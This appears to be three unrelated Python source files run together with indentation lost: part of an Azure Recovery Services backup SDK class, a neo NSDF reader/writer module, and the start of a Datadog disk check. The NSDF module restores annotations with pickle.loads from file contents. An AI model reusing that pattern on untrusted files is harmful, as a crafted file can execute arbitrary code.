get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupFabrics/{fabricName}/protectionContainers/{containerName}'} # type: ignore
@distributed_trace
def register(
self,
vault_name: str,
resource_group_name: str,
fabric_name: str,
container_name: str,
parameters: "_models.ProtectionContainerResource",
**kwargs: Any
) -> Optional["_models.ProtectionContainerResource"]:
"""Registers the container with Recovery Services vault.
This is an asynchronous operation. To track the operation status, use location header to call
get latest status of
the operation.
:param vault_name: The name of the recovery services vault.
:type vault_name: str
:param resource_group_name: The name of the resource group where the recovery services vault is
present.
:type resource_group_name: str
:param fabric_name: Fabric name associated with the container.
:type fabric_name: str
:param container_name: Name of the container to be registered.
:type container_name: str
:param parameters: Request body for operation.
:type parameters:
~azure.mgmt.recoveryservicesbackup.activestamp.models.ProtectionContainerResource
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ProtectionContainerResource, or the result of cls(response)
:rtype: ~azure.mgmt.recoveryservicesbackup.activestamp.models.ProtectionContainerResource or
None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.ProtectionContainerResource"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'ProtectionContainerResource')
request = build_register_request(
vault_name=vault_name,
resource_group_name=resource_group_name,
subscription_id=self._config.subscription_id,
fabric_name=fabric_name,
container_name=container_name,
content_type=content_type,
json=_json,
template_url=self.register.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ProtectionContainerResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
register.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupFabrics/{fabricName}/protectionContainers/{containerName}'} # type: ignore
@distributed_trace
def unregister(
self,
vault_name: str,
resource_group_name: str,
fabric_name: str,
container_name: str,
**kwargs: Any
) -> None:
"""Unregisters the given container from your Recovery Services Vault. This is an asynchronous
operation. To determine
whether the backend service has finished processing the request, call Get Container Operation
Result API.
:param vault_name: The name of the recovery services vault.
:type vault_name: str
:param resource_group_name: The name of the resource group where the recovery services vault is
present.
:type resource_group_name: str
:param fabric_name: Name of the fabric where the container belongs.
:type fabric_name: str
:param container_name: Name of the container which needs to be unregistered from the Recovery
Services Vault.
:type container_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_unregister_request(
vault_name=vault_name,
resource_group_name=resource_group_name,
subscription_id=self._config.subscription_id,
fabric_name=fabric_name,
container_name=container_name,
template_url=self.unregister.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
unregister.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupFabrics/{fabricName}/protectionContainers/{containerName}'} # type: ignore
@distributed_trace
def inquire(
self,
vault_name: str,
resource_group_name: str,
fabric_name: str,
container_name: str,
filter: Optional[str] = None,
**kwargs: Any
) -> None:
"""Inquires all the protectable items under the given container.
This is an async operation and the results should be tracked using location header or
Azure-async-url.
:param vault_name: The name of the recovery services vault.
:type vault_name: str
:param resource_group_name: The name of the resource group where the recovery services vault is
present.
:type resource_group_name: str
:param fabric_name: Fabric Name associated with the container.
:type fabric_name: str
:param container_name: Name of the container in which inquiry needs to be triggered.
:type container_name: str
:param filter: OData filter options.
:type filter: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_inquire_request(
vault_name=vault_name,
resource_group_name=resource_group_name,
subscription_id=self._config.subscription_id,
fabric_name=fabric_name,
container_name=container_name,
filter=filter,
template_url=self.inquire.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
inquire.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupFabrics/{fabricName}/protectionContainers/{containerName}/inquire'} # type: ignore
@distributed_trace
def refresh(
self,
vault_name: str,
resource_group_name: str,
fabric_name: str,
filter: Optional[str] = None,
**kwargs: Any
) -> None:
"""Discovers all the containers in the subscription that can be backed up to Recovery Services
Vault. This is an
asynchronous operation. To know the status of the operation, call GetRefreshOperationResult
API.
:param vault_name: The name of the recovery services vault.
:type vault_name: str
:param resource_group_name: The name of the resource group where the recovery services vault is
present.
:type resource_group_name: str
:param fabric_name: Fabric name associated the container.
:type fabric_name: str
:param filter: OData filter options.
:type filter: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_refresh_request(
vault_name=vault_name,
resource_group_name=resource_group_name,
subscription_id=self._config.subscription_id,
fabric_name=fabric_name,
filter=filter,
template_url=self.refresh.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
refresh.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupFabrics/{fabricName}/refreshContainers'} # type: ignore
| |
# -*- coding: utf-8 -*-
"""
Module for reading and writing NSDF files
Author: Mieszko Grodzicki
This module support both reading and writing NDSF files.
Note: Read file must be written using this IO
"""
from __future__ import absolute_import
import numpy as np
import quantities as pq
from uuid import uuid1
import pickle
from datetime import datetime
import os
try:
import nsdf
import h5py
except ImportError as err:
HAVE_NSDF = False
NSDF_ERR = err
else:
HAVE_NSDF = True
NSDF_ERR = None
from neo.io.baseio import BaseIO
from neo.core import Block, Segment, AnalogSignal, IrregularlySampledSignal, \
Event, Epoch, ChannelIndex
class NSDFIO(BaseIO):
"""
Class for reading and writing files in NSDF Format.
It supports reading and writing: Block, Segment, AnalogSignal, IrregularlySampledSignal,
Event, ChannelIndex, with all relationships and metadata.
"""
is_readable = True
is_writable = True
supported_objects = [Block, Segment, ChannelIndex, AnalogSignal,
IrregularlySampledSignal, Event]
readable_objects = [Block, Segment]
writeable_objects = [Block, Segment]
has_header = False
is_streameable = False
name = 'NSDF'
extensions = ['h5']
mode = 'file'
def __init__(self, filename=None):
"""
Initialise NSDFIO instance
:param filename: Path to the file
"""
if not HAVE_NSDF:
raise Exception("Failed to import NSDF.")
if filename is None:
raise ValueError("Must provide an input file.")
BaseIO.__init__(self)
self.filename = filename
self.dt_format = '%d/%m/%Y %H:%M:%S'
self.modeltree_path = '/model/modeltree/neo/'
def write_all_blocks(self, blocks):
"""
Write list of blocks to the file
:param blocks: List of blocks to be written
"""
writer = self._init_writing()
neo_model, blocks_model, segments_model = self._prepare_model_tree(writer)
name_pattern = self._name_pattern(len(blocks))
for i, block in enumerate(blocks):
self.write_block(block, name_pattern.format(i), blocks_model, writer)
def write_block(self, block=None, name='0', parent=None, writer=None):
"""
Write a Block to the file
:param block: Block to be written
:param name: Name for block representation in NSDF model tree (optional)
:param writer: NSDFWriter instance (optional)
:param parent: NSDF ModelComponent which will be the parent of block NSDF representation (optional)
"""
if not isinstance(block, Block):
raise ValueError("Must provide a Block to write.")
if writer is None:
writer = self._init_writing()
if parent is None:
neo_model, parent, segments_model = self._prepare_model_tree(writer)
block_model = nsdf.ModelComponent(name, uid=uuid1().hex, parent=parent)
self._write_container_metadata(block, block_model)
self._write_model_component(block_model, writer)
self._write_block_children(block, block_model, writer)
self._clean_nsdfio_annotations(block)
def _write_block_children(self, block, block_model, writer):
self._write_children(block.segments, 'segments', 'write_segment', block_model, writer)
self._write_children(block.channel_indexes, 'channel_indexes', 'write_channelindex',
block_model, writer)
def write_segment(self, segment=None, name='0', writer=None, parent=None):
"""
Write a Segment to the file
:param segment: Segment to be written
:param name: Name for segment representation in NSDF model tree (optional)
:param writer: NSDFWriter instance (optional)
:param parent: NSDF ModelComponent which will be the parent of segment NSDF representation (optional)
"""
if not isinstance(segment, Segment):
raise ValueError("Must provide a Segment to write.")
if writer is None:
writer = self._init_writing()
single_segment = False
if parent is None:
neo_model, blocks_model, parent = self._prepare_model_tree(writer)
single_segment = True
model = nsdf.ModelComponent(name, uid=uuid1().hex, parent=parent)
self._write_container_metadata(segment, model)
self._write_model_component(model, writer)
self._write_segment_children(model, segment, writer)
if single_segment:
self._clean_nsdfio_annotations(segment)
def _write_segment_children(self, model, segment, writer):
self._write_children(segment.analogsignals, 'analogsignals', 'write_analogsignal', model, writer)
self._write_children(segment.irregularlysampledsignals, 'irregularlysampledsignals',
'write_irregularlysampledsignal', model, writer)
self._write_children(segment.events, 'events', 'write_event', model, writer)
self._write_children(segment.epochs, 'epochs', 'write_epoch', model, writer)
def write_analogsignal(self, signal, name, writer, parent):
"""
Write an AnalogSignal to the file
:param signal: AnalogSignal to be written
:param name: Name for signal representation in NSDF model tree
:param writer: NSDFWriter instance
:param parent: NSDF ModelComponent which will be the parent of signal NSDF representation
"""
self._write_signal(signal, name, writer, parent)
def write_irregularlysampledsignal(self, signal, name, writer, parent):
"""
Write an IrregularlySampledSignal to the file
:param signal: IrregularlySampledSignal to be written
:param name: Name for signal representation in NSDF model tree
:param writer: NSDFWriter instance
:param parent: NSDF ModelComponent which will be the parent of signal NSDF representation
"""
self._write_signal(signal, name, writer, parent)
def _write_signal(self, signal, name, writer, parent):
uid = uuid1().hex
model = nsdf.ModelComponent(name, uid=uid, parent=parent)
regular = isinstance(signal, AnalogSignal)
if self._write_only_reference(model, signal, uid, writer):
return
self._write_basic_metadata(model, signal)
r_signal = np.swapaxes(signal, 0, 1)
channels_model, channels, source_ds = self._create_signal_data_sources(model, len(r_signal),
uid, writer, regular)
self._write_signal_data(model, channels, r_signal, signal, source_ds, writer)
self._write_model_tree(model, writer)
signal.annotations['nsdfio_uid'] = uid
def write_event(self, event, name, writer, parent):
"""
Write an Event to the file
:param event: Event to be written
:param name: Name for event representation in NSDF model tree
:param writer: NSDFWriter instance
:param parent: NSDF ModelComponent which will be the parent of event NSDF representation
"""
self._write_event_object(event, name, writer, parent)
def write_epoch(self, epoch, name, writer, parent):
"""
Write an Epoch to the file
:param epoch: Epoch to be written
:param name: Name for epoch representation in NSDF model tree
:param writer: NSDFWriter instance
:param parent: NSDF ModelComponent which will be the parent of epoch NSDF representation
"""
self._write_event_object(epoch, name, writer, parent)
def _write_event_object(self, object, name, writer, parent):
uid = uuid1().hex
model = nsdf.ModelComponent(name, uid=uid, parent=parent)
if self._write_only_reference(model, object, uid, writer):
return
self._write_basic_metadata(model, object)
self._write_model_component(model, writer)
source_ds, source_name_dict = self._create_event_data_sources(model, uid, writer)
self._write_event_data(object, model, source_ds, source_name_dict, writer)
if isinstance(object, Epoch):
source_ds, source_name_dict = self._create_epoch_data_sources(model, uid, writer)
self._write_epoch_data(object, model, source_ds, source_name_dict, writer)
object.annotations['nsdfio_uid'] = uid
def write_channelindex(self, channelindex, name, writer, parent):
"""
Write a ChannelIndex to the file
:param channelindex: ChannelIndex to be written
:param name: Name for channelindex representation in NSDF model tree
:param writer: NSDFWriter instance
:param parent: NSDF ModelComponent which will be the parent of channelindex NSDF representation
"""
uid = uuid1().hex
model = nsdf.ModelComponent(name, uid=uid, parent=parent)
self._write_basic_metadata(model, channelindex)
self._write_model_component(model, writer)
self._write_channelindex_arrays(model, channelindex, writer)
self._write_channelindex_children(channelindex, model, writer)
def _write_channelindex_children(self, channelindex, model, writer):
self._write_children(channelindex.analogsignals, 'analogsignals', 'write_analogsignal', model, writer)
def _write_children(self, children, name, function, parent_model, writer):
model = nsdf.ModelComponent(name=name, uid=uuid1().hex, parent=parent_model)
self._write_model_component(model, writer)
name_pattern = self._name_pattern(len(children))
for i, child in enumerate(children):
getattr(self, function)(child, name_pattern.format(i), writer, model)
def _init_writing(self):
return nsdf.NSDFWriter(self.filename, mode='w', dialect=nsdf.dialect.NUREGULAR)
def _prepare_model_tree(self, writer):
neo_model = nsdf.ModelComponent('neo', uid=uuid1().hex)
self._write_model_component(neo_model, writer)
blocks_model = nsdf.ModelComponent('blocks', uid=uuid1().hex, parent=neo_model)
self._write_model_component(blocks_model, writer)
segments_model = nsdf.ModelComponent('segments', uid=uuid1().hex, parent=neo_model)
self._write_model_component(segments_model, writer)
return neo_model, blocks_model, segments_model
def _number_of_digits(self, n):
return len(str(n))
def _name_pattern(self, how_many_items):
return '{{:0{}d}}'.format(self._number_of_digits(max(how_many_items - 1, 0)))
def _clean_nsdfio_annotations(self, object):
nsdfio_annotations = ('nsdfio_uid',)
for key in nsdfio_annotations:
object.annotations.pop(key, None)
if hasattr(object, 'children'):
for child in object.children:
self._clean_nsdfio_annotations(child)
def _write_only_reference(self, model, object, uid, writer):
if object.annotations.get('nsdfio_uid') is not None:
model.attrs['reference_to'] = object.annotations['nsdfio_uid']
self._write_model_component(model, writer)
return True
return False
def _write_model_component(self, model, writer):
if model.parent is None:
nsdf.add_model_component(model, writer.model['modeltree/'])
else:
nsdf.add_model_component(model, model.parent.hdfgroup)
def _write_model_tree(self, model, writer):
self._write_model_component(model, writer)
for child in model.children.values():
self._write_model_tree(child, writer)
def _write_container_metadata(self, container, container_model):
self._write_basic_metadata(container_model, container)
self._write_datetime_attributes(container_model, container)
self._write_index_attribute(container_model, container)
def _write_basic_metadata(self, model, object):
self._write_basic_attributes(model, object)
self._write_annotations(model, object)
def _write_basic_attributes(self, model, object):
if object.name is not None:
model.attrs['name'] = self._encode_string(object.name)
if object.description is not None:
model.attrs['description'] = self._encode_string(object.description)
def _write_datetime_attributes(self, model, object):
if object.rec_datetime is not None:
model.attrs['rec_datetime'] = object.rec_datetime.strftime(self.dt_format)
def _write_index_attribute(self, model, object):
if object.index is not None:
model.attrs['index'] = object.index
def _write_annotations(self, model, object):
if object.annotations is not None:
object.annotations.pop('nsdfio_path', None)
model.attrs['annotations'] = self._encode_string(pickle.dumps(object.annotations, 0))
def _write_signal_data(self, model, channels, r_signal, signal, source_ds, writer):
regular = isinstance(signal, AnalogSignal)
if regular:
self._write_analogsignal_data(model, channels, r_signal, signal, source_ds, writer)
else:
self._write_irregularlysampledsignal_data(model, channels, r_signal, signal, source_ds, writer)
def _write_analogsignal_data(self, model, channels, r_signal, signal, source_ds, writer):
dataobj = nsdf.UniformData('signal', unit=str(signal.units.dimensionality))
dataobj.set_dt(float(signal.sampling_period.magnitude),
str(signal.sampling_period.dimensionality))
dataobj.dtype = signal.dtype
for i in range(len(channels)):
dataobj.put_data(channels[i].uid, r_signal[i])
rescaled_tstart = signal.t_start.rescale(signal.sampling_period.dimensionality)
writer.add_uniform_data(source_ds, dataobj,
tstart=float(rescaled_tstart.magnitude))
model.attrs['t_start_unit'] = str(signal.t_start.dimensionality)
def _write_irregularlysampledsignal_data(self, model, channels, r_signal, signal, source_ds, writer):
dataobj = nsdf.NonuniformRegularData('signal', unit=str(signal.units.dimensionality))
dataobj.set_times(signal.times, str(signal.times.units.dimensionality))
dataobj.dtype = signal.dtype
for i in range(len(channels)):
dataobj.put_data(channels[i].uid, r_signal[i])
writer.add_nonuniform_regular(source_ds, dataobj)
def _create_signal_data_sources(self, model, channels_number, uid, writer, regular):
channels = []
channels_model = nsdf.ModelComponent(name='channels', uid=uuid1().hex, parent=model)
name_pattern = '{{:0{}d}}'.format(self._number_of_digits(max(channels_number - 1, 0)))
for i in range(channels_number):
channels.append(nsdf.ModelComponent(name_pattern.format(i),
uid=uuid1().hex,
parent=channels_model))
if regular:
source_ds = writer.add_uniform_ds(uid, [channel.uid.encode() for channel in channels])
else:
source_ds = writer.add_nonuniform_ds(uid, [channel.uid.encode() for channel in channels])
return channels_model, channels, source_ds
def _write_event_data(self, event, model, source_ds, source_name_dict, writer):
dataobj = nsdf.EventData('times', unit=str(event.units.dimensionality))
dataobj.put_data(model.uid, event.times)
writer.add_event_1d(source_ds, dataobj, source_name_dict)
self._write_array(model.hdfgroup, 'labels', event.labels)
def _create_event_data_sources(self, model, uid, writer):
source_ds = writer.add_event_ds_1d(uid, 'times', [uid])
source_name_dict = {}
source_name_dict[uid] = 'data'
return source_ds, source_name_dict
def _write_epoch_data(self, epoch, model, source_ds, source_name_dict, writer):
dataobj = nsdf.EventData('durations', unit=str(epoch.durations.units.dimensionality))
dataobj.put_data(model.uid, epoch.durations)
writer.add_event_1d(source_ds, dataobj, source_name_dict)
def _create_epoch_data_sources(self, model, uid, writer):
source_ds = writer.add_event_ds_1d(uid, 'durations', [uid])
source_name_dict = {}
source_name_dict[uid] = 'data'
return source_ds, source_name_dict
def _write_channelindex_arrays(self, model, channelindex, writer):
group = model.hdfgroup
self._write_array(group, 'index', channelindex.index)
if channelindex.channel_names is not None:
self._write_array(group, 'channel_names', channelindex.channel_names)
if channelindex.channel_ids is not None:
self._write_array(group, 'channel_ids', channelindex.channel_ids)
if channelindex.coordinates is not None:
self._write_array(group, 'coordinates', channelindex.coordinates)
def _write_array(self, group, name, array):
if isinstance(array, pq.Quantity):
group.create_dataset(name, data=array.magnitude)
group[name].attrs['dimensionality'] = str(array.dimensionality)
elif isinstance(array, np.ndarray):
if array.dtype.type == np.str_:
array = np.void(np.char.encode(array))
elif array.dtype.type == np.bytes_:
array = np.void(array)
group.create_dataset(name, data=array)
else:
group.create_dataset(name, data=array)
group[name].attrs['is_list'] = 'True'
def _encode_string(self, string):
if isinstance(string, str):
string = string.encode()
return np.void(string)
def read_all_blocks(self, lazy=False, cascade=True):
"""
Read all blocks from the file
:param lazy: Enables lazy reading
:param cascade: Read nested objects or not?
:return: List of read blocks
"""
reader = self._init_reading()
blocks = []
blocks_path = self.modeltree_path + 'blocks/'
for block in reader.model[blocks_path].values():
blocks.append(self.read_block(lazy, cascade, group=block, reader=reader))
return blocks
def read_block(self, lazy=False, cascade=True, group=None, reader=None):
"""
Read a Block from the file
:param lazy: Enables lazy reading
:param cascade: Read nested objects or not?
:param group: HDF5 Group representing the block in NSDF model tree (optional)
:param reader: NSDFReader instance (optional)
:return: Read block
"""
block = Block()
group, reader, single_block = self._select_first_container(group, reader, 'block')
if group is None:
return None
attrs = group.attrs
if cascade:
self._read_block_children(lazy, block, group, reader)
block.create_many_to_one_relationship()
self._read_container_metadata(attrs, block, path=group.name)
return block
def _read_block_children(self, lazy, block, group, reader):
for child in group['segments/'].values():
block.segments.append(self.read_segment(lazy=lazy, group=child, reader=reader))
for child in group['channel_indexes/'].values():
block.channel_indexes.append(self.read_channelindex(lazy=lazy, group=child, reader=reader))
def read_segment(self, lazy=False, cascade=True, group=None, reader=None):
"""
Read a Segment from the file
:param lazy: Enables lazy reading
:param cascade: Read nested objects or not?
:param group: HDF5 Group representing the segment in NSDF model tree (optional)
:param reader: NSDFReader instance (optional)
:return: Read segment
"""
segment = Segment()
group, reader, single_segment = self._select_first_container(group, reader, 'segment')
if group is None:
return None
attrs = group.attrs
if cascade:
self._read_segment_children(lazy, group, reader, segment)
if single_segment:
segment.create_many_to_one_relationship()
self._read_container_metadata(attrs, segment, path=group.name)
return segment
def _read_segment_children(self, lazy, group, reader, segment):
for child in group['analogsignals/'].values():
segment.analogsignals.append(self.read_analogsignal(lazy=lazy, group=child, reader=reader))
for child in group['irregularlysampledsignals/'].values():
segment.irregularlysampledsignals.append(self.read_irregularlysampledsignal(lazy=lazy, group=child,
reader=reader))
for child in group['events/'].values():
segment.events.append(self.read_event(lazy=lazy, group=child, reader=reader))
for child in group['epochs/'].values():
segment.epochs.append(self.read_epoch(lazy=lazy, group=child, reader=reader))
def read_analogsignal(self, lazy=False, cascade=True, group=None, reader=None):
"""
Read an AnalogSignal from the file (must be child of a Segment)
:param lazy: Enables lazy reading
:param cascade: Read nested objects or not?
:param group: HDF5 Group representing the analogsignal in NSDF model tree
:param reader: NSDFReader instance
:return: Read AnalogSignal
"""
attrs = group.attrs
if attrs.get('reference_to') is not None:
return self.objects_dict[attrs['reference_to']]
uid = attrs['uid']
data_group = reader.data['uniform/{}/signal'.format(uid)]
t_start = self._read_analogsignal_t_start(attrs, data_group)
signal = self._create_analogsignal(data_group, lazy, group, t_start, uid, reader)
self._read_basic_metadata(attrs, signal, path=group.name)
self.objects_dict[uid] = signal
return signal
def read_irregularlysampledsignal(self, lazy=False, cascade=True, group=None, reader=None):
"""
Read an IrregularlySampledSignal from the file (must be child of a Segment)
:param lazy: Enables lazy reading
:param cascade: Read nested objects or not?
:param group: HDF5 Group representing the irregularlysampledsignal in NSDF model tree
:param reader: NSDFReader instance
:return: Read AnalogSignal
"""
attrs = group.attrs
if attrs.get('reference_to') is not None:
return self.objects_dict[attrs['reference_to']]
uid = attrs['uid']
data_group = reader.data['nonuniform/{}/signal'.format(uid)]
signal = self._create_irregularlysampledsignal(data_group, lazy, group, uid, reader)
self._read_basic_metadata(attrs, signal, path=group.name)
self.objects_dict[uid] = signal
return signal
def read_event(self, lazy=False, cascade=True, group=None, reader=None):
"""
Read an Event from the file (must be child of a Segment)
:param lazy: Enables lazy reading
:param cascade: Read nested objects or not?
:param group: HDF5 Group representing the event in NSDF model tree
:param reader: NSDFReader instance
:return: Read Event
"""
attrs = group.attrs
if attrs.get('reference_to') is not None:
return self.objects_dict[attrs['reference_to']]
uid = attrs['uid']
data_group = reader.data['event/{}/times/data'.format(uid)]
event = self._create_event(data_group, group, lazy, reader, uid)
self._read_basic_metadata(attrs, event, path=group.name)
self.objects_dict[uid] = event
return event
def read_epoch(self, lazy=False, cascade=True, group=None, reader=None):
"""
Read an Epoch from the file (must be child of a Segment)
:param lazy: Enables lazy reading
:param cascade: Read nested objects or not?
:param group: HDF5 Group representing the epoch in NSDF model tree
:param reader: NSDFReader instance
:return: Read Epoch
"""
attrs = group.attrs
if attrs.get('reference_to') is not None:
return self.objects_dict[attrs['reference_to']]
uid = attrs['uid']
times_group = reader.data['event/{}/times/data'.format(uid)]
durations_group = reader.data['event/{}/durations/data'.format(uid)]
epoch = self._create_epoch(times_group, durations_group, group, lazy, reader, uid)
self._read_basic_metadata(attrs, epoch, path=group.name)
self.objects_dict[uid] = epoch
return epoch
def read_channelindex(self, lazy=False, cascade=True, group=None, reader=None):
"""
Read a ChannelIndex from the file (must be child of a Block)
:param lazy: Enables lazy reading
:param cascade: Read nested objects or not?
:param group: HDF5 Group representing the channelindex in NSDF model tree
:param reader: NSDFReader instance
:return: Read ChannelIndex
"""
attrs = group.attrs
channelindex = self._create_channelindex(group)
if cascade:
self._read_channelindex_children(lazy, group, reader, channelindex)
self._read_basic_metadata(attrs, channelindex, path=group.name)
return channelindex
def _read_channelindex_children(self, lazy, group, reader, channelindex):
for child in group['analogsignals/'].values():
channelindex.analogsignals.append(self.read_analogsignal(lazy=lazy, group=child, reader=reader))
def load_lazy_object(self, object):
type = object.__class__.__name__.lower()
function = getattr(self, 'read_' + type);
reader = self._init_reading()
group = reader.model[object.annotations['nsdfio_path']]
return function(lazy=False, cascade=False, group=group, reader=reader)
def _init_reading(self):
reader = nsdf.NSDFReader(self.filename)
self.file_datetime = datetime.fromtimestamp(os.stat(self.filename).st_mtime)
self.objects_dict = {}
return reader
def _select_first_container(self, group, reader, name):
if reader is None:
reader = self._init_reading()
single = False
if group is None:
path = self.modeltree_path + name + 's/'
if len(reader.model[path].values()) > 0:
group = list(reader.model[path].values())[0]
single = True
return group, reader, single
def _read_container_metadata(self, attrs, container, path):
self._read_basic_metadata(attrs, container, path)
self._read_datetime_attributes(attrs, container)
self._read_index_attribute(attrs, container)
def _read_basic_metadata(self, attrs, signal, path):
self._read_basic_attributes(attrs, signal)
self._read_annotations(attrs, signal)
signal.annotations['nsdfio_path'] = path
def _read_basic_attributes(self, attrs, object):
if attrs.get('name') is not None:
object.name = self._decode_string(attrs['name'])
if attrs.get('description') is not None:
object.description = self._decode_string(attrs['description'])
object.file_origin = self.filename
def _read_datetime_attributes(self, attrs, object):
object.file_datetime = self.file_datetime
if attrs.get('rec_datetime') is not None:
object.rec_datetime = datetime.strptime(attrs['rec_datetime'], self.dt_format)
def _read_annotations(self, attrs, object):
if attrs.get('annotations') is not None:
object.annotations = pickle.loads(attrs['annotations'])
def _read_index_attribute(self, attrs, object):
if attrs.get('index') is not None:
object.index = int(attrs['index'])
def _create_analogsignal(self, data_group, lazy, group, t_start, uid, reader):
if lazy:
data_shape = data_group.shape
data_shape = (data_shape[1], data_shape[0])
signal = self._create_lazy_analogsignal(data_shape, data_group, uid, t_start)
else:
dataobj = reader.get_uniform_data(uid, 'signal')
data = self._read_signal_data(dataobj, group)
signal = self._create_normal_analogsignal(data, dataobj, uid, t_start)
return signal
def _create_irregularlysampledsignal(self, data_group, lazy, group, uid, reader):
if lazy:
data_shape = (data_group.shape[1], data_group.shape[0])
data = []
times = []
else:
dataobj = reader.get_nonuniform_data(uid, 'signal')
data = np.swapaxes(self._read_signal_data(dataobj, group), 0, 1);
times = dataobj.get_times()
signal = IrregularlySampledSignal(times, data, units=data_group.attrs['unit'], dtype=data_group.dtype,
time_units=reader.mapping['time/{}_signal'.format(uid)].attrs['unit'])
if lazy:
signal.lazy_shape = data_shape
return signal
def _create_event(self, data_group, group, lazy, reader, uid):
if lazy:
times = []
labels = np.array([], dtype='S')
else:
dataobj = reader.get_event_data(uid, 'times')
times = dataobj.get_data(uid)
labels = self._read_array(group, 'labels')
event = Event(times=times, units=data_group.attrs['unit'], labels=labels)
if lazy:
event.lazy_shape = (data_group.shape[0],)
return event
def _create_epoch(self, times_group, durations_group, group, lazy, reader, uid):
if lazy:
times = []
durations = []
labels = np.array([], dtype='S')
else:
dataobj = reader.get_event_data(uid, 'times')
times = dataobj.get_data(uid)
dataobj = reader.get_event_data(uid, 'durations')
durations = dataobj.get_data(uid)
labels = self._read_array(group, 'labels')
epoch = Epoch(times=pq.Quantity(times, times_group.attrs['unit']),
durations=pq.Quantity(durations, durations_group.attrs['unit']),
labels=labels)
if lazy:
epoch.lazy_shape = (times_group.shape[0],)
return epoch
def _read_analogsignal_t_start(self, attrs, data_group):
t_start = float(data_group.attrs['tstart']) * pq.Quantity(1, data_group.attrs['tunit'])
t_start = t_start.rescale(attrs['t_start_unit'])
return t_start
def _read_signal_data(self, dataobj, group):
data = []
for channel in group['channels/'].values():
channel_uid = channel.attrs['uid']
data += [dataobj.get_data(channel_uid)]
return data
def _create_normal_analogsignal(self, data, dataobj, uid, t_start):
return AnalogSignal(np.swapaxes(data, 0, 1), dtype=dataobj.dtype, units=dataobj.unit,
t_start=t_start, sampling_period=pq.Quantity(dataobj.dt, dataobj.tunit))
def _create_lazy_analogsignal(self, shape, data, uid, t_start):
attrs = data.attrs
signal = AnalogSignal([], dtype=data.dtype, units=attrs['unit'],
t_start=t_start, sampling_period=pq.Quantity(attrs['dt'], attrs['tunit']))
signal.lazy_shape = shape
return signal
def _create_channelindex(self, group):
return ChannelIndex(index=self._read_array(group, 'index'),
channel_names=self._read_array(group, 'channel_names'),
channel_ids=self._read_array(group, 'channel_ids'),
coordinates=self._read_array(group, 'coordinates'))
def _read_array(self, group, name):
if group.__contains__(name) == False:
return None
array = group[name][:]
if group[name].attrs.get('dimensionality') is not None:
return pq.Quantity(array, group[name].attrs['dimensionality'])
dtype = None
if array.dtype.type == np.void:
array = self._decode_string_array(array)
dtype = 'S'
if group[name].attrs.get('is_list'):
return array
return np.array(array, dtype=dtype)
def _decode_string_array(self, array):
if len(np.shape(array)) == 0:
return self._decode_string(array)
result = []
for row in array:
result.append(self._decode_string_array(row))
return result
def _decode_string(self, string):
return str(string.tostring().decode())
| |
# stdlib
import os
import re
# 3p
try:
import psutil
except ImportError:
psutil = None
# datadog
from checks import AgentCheck
from config import _is_affirmative
from utils.platform import Platform
from utils.subprocess_output import get_subprocess_output
from utils.timeout import (
timeout,
TimeoutException,
)
class Disk(AgentCheck):
""" Collects metrics about the machine's disks. """
# -T for filesystem info
DF_COMMAND = ['df', '-T']
